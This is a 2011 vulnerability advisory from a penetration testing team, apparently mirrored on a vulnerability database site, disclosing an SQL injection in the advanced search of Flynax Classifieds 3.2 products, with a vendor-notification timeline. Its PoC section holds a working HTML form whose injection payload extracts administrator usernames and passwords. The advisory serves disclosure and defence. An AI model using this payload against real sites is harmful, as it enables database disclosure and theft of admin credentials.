Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27065
HistorySep 26, 2011 - 12:00 a.m.

Vulnerability found in Flynax Classifieds products

2011-09-2600:00:00
vulners.com
241

I. BACKGROUND

Flynax is a software development company which produces several CMSs to mantain
different kinds of classifieds websites.

II. DESCRIPTION

Nasel members discovered a critical vulnerability in the front-end of
these products.

The vulnerability is an SQL injection in the advanced search,
specifically in the "f[city]" parameter located at following files:

  • General Classifieds Software: dealers.html,
  • Real Estate Classifieds: agents-realtors.html.
  • Auto Classifieds Script: dealers.html
  • Pets Classifieds Software: dealers.html

Exploiting this vulnerability can lead to a full disclosure of the database.

III. AFFECTED PRODUCTS

  • General Classifieds Software 3.2
  • Auto Classifieds Script 3.2
  • Real Estate Classifieds 3.2
  • Pets Classifieds Software 3.2

IV. PoC

<form action="http://site/path/dealers.html&quot; method="post">
Injection:<input value="') and 1=0 union all select
1,2,3,4,concat_ws(0x3a, User,
Pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from
fl_admins#" name="f[city]" type="text">
<input type="hidden" name="search" value="true">
<input type="hidden" value="" name="f[country]">
<input type="submit" value="Send">
</form>

The name of the admin users table can differ depending on the product's version.

V. CREDITS

This vulnerability was found by the Nasel Penetration Testing team formed by:

  • Alessandri, Santiago (salessandri [at] nasel [dot] com [dot] ar)
  • Benencia, Raul (rbenencia [at] nasel [dot] com [dot] ar)
  • Fontanini, Matias (mfontanini [at] nasel [dot] com [dot] ar)
  • Traberg, Carlos Gaston (gtraberg [at] nasel [dot] com [dot] ar)

VI. ADVISORY INFORMATION

2011-09-15

Vulnerability Found. Vendor notification. Scheduled advisory release
on September 25th, 2011.

2011-09-17

Vendor replied that the problem was fixed.

2011-09-25

Advisory released.


Nasel Penetration Testing Team
http://www.nasel.com.ar